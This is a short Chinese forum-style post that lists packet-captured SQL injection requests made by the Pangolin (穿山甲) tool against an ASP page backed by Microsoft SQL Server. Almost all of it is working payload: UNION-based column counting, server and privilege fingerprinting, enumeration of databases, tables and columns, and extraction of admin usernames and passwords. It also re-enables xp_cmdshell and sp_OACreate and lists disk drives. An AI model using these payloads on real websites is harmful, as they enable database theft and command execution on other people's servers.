作者:TheLostMind
看了下穿山甲,很牛X的工具,抓了下包,随便整理了一下,无聊时看看……
===============================================
Target url is : http://www.xxx.com/news.asp?class_id=1165
HTTP Method is : GET
Inject type is : Integer
Do you really want to delete it?
Field count is : 14
The field's count 14
The string field position at 2
抓包内容:
union all select null-- and 1=1
union all select null,null-- and 1=1
union all select null,null,null-- and 1=1
这里省略…………………………………………
union all select null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select cast
(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar
(8000)),null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select null,cast
(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar
(8000)),null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select null,cast(db_name() as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
获取综合信息:
and 1=2 union all select null,cast(@@version as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(db_name() as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(@@servername as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(system_user as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(user as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(is_member(0x640062005f006f0077006e0065007200) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 2 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 3 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 4 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
这里省略……………………
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 40 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));-- and 1=1
;insert foofoofoo exec master.dbo.xp_availablemedia;-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([type] as nvarchar(4000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from
foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
;create table foofoofoo(name nvarchar(255),description nvarchar(4000));-- and 1=1
;insert foofoofoo exec master.dbo.xp_enumgroups;-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([description] as nvarchar(4000)) as
nvarchar(4000)) ,null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top
1 * from foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
获取表:
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where
xtype=char(85) and status>0--
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 1
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 2
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
这里省略………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 15
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
获取列:
and 1=2 union all select top 1 null,cast(cast(id as nvarchar(20)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where
name=0x73006b0079005f005500730065007200--
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[syscolumns] where
id=2068202418--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
1 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
2 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
这里省略……………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
10 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
11 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
获取内容:
and 1=2 union all select null,cast(cast(count(*) as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sky_user] where 1=1--
and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 1 id
from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top
1 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select
top 1 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 2 id
from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top
2 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select
top 2 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
恢复XP_CMDSHELL:
and substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00) as nvarchar(4000)),
1, 1)>8
;exec master.dbo.sp_addextendedproc 0x780070005f0063006d0064007300680065006c006c00,
0x780070006c006f006700370030002e0064006c006c00--
恢复SP_OA……
;exec master.dbo.sp_addextendedproc 0x730070005f004f004100430072006500610074006500,
0x780070006c006f006700370030002e0064006c006c00--
列磁盘:
;drop table foofoofoo;--
;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--
;insert foofoofoo exec master.dbo.xp_availablemedia;--
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000))cast([type] as nvarchar(4000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from
foofoofoo order by [name] group by name) t order by [name] desc)t--
;drop table foofoofoo;--
不抓了。。。。自己抓吧………………
==============================================